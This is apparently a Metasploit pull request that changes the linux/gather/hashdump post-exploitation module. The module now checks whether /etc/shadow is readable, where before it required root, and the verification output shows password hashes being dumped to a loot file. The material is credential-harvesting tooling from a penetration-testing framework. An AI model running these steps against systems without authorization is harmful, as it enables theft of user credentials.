### PR TITLE
remove is_root check from linux_hashdump module

### DIFF
--- a/modules/post/linux/gather/hashdump.rb
+++ b/modules/post/linux/gather/hashdump.rb
@@ -22,8 +22,8 @@ class MetasploitModule < Msf::Post
 
   # Run Method for when run command is issued
   def run
-    unless is_root?
-      fail_with Failure::NoAccess, 'You must run this module as root!'
+    unless readable?('/etc/shadow')
+      fail_with Failure::NoAccess, 'Shadow file must be readable in order to dump hashes'
     end
 
     passwd_file = read_file('/etc/passwd')


### PR DESCRIPTION
## Summary
This PR fixes a logic bug in module `/post/linux/gather/hashdump` which is used to dump hashes from shadow file.

## The Bug
```ruby
unless is_root?
  fail_with Failure::NoAccess, 'You must run this module as root!'
end
```
The module checks if the user is root or not. If the user is not root it exits. But there can be a case when a non-root user might have read access to the shadow file because of weak permissions. I think it's better to check if the `shadow` file is readable or not.

## Verification Steps
Fire up `Metasploit` and get a non-root user session
```
msf6 > sessions -c "id -u" -i 1
[*] Running 'id -u' on shell session 1 (127.0.0.1)
1000

msf6 > use post/linux/gather/hashdump
msf6 post(linux/gather/hashdump) > set session 1
msf6 post(linux/gather/hashdump) > run 
[*] Reloading module...

[-] Post aborted due to failure: no-access: Shadow file must be readable in order to dump hash
es
[*] Post module execution completed
```
As root do `chmod o+r /etc/shadow`
```
msf6 post(linux/gather/hashdump) > run
[+] root:[hash]:0:0:root:/root:/bin/bash
[+] user:[hash]:1000:1000:User Name,,,:/home/user:/bin/bash
[+] Unshadowed Password File: /home/pingport80/.msf4/loot/20210421104310_default_127.0.0.1_lin
ux.hashes_337278.txt
[*] Post module execution completed
msf6 post(linux/gather/hashdump) >
```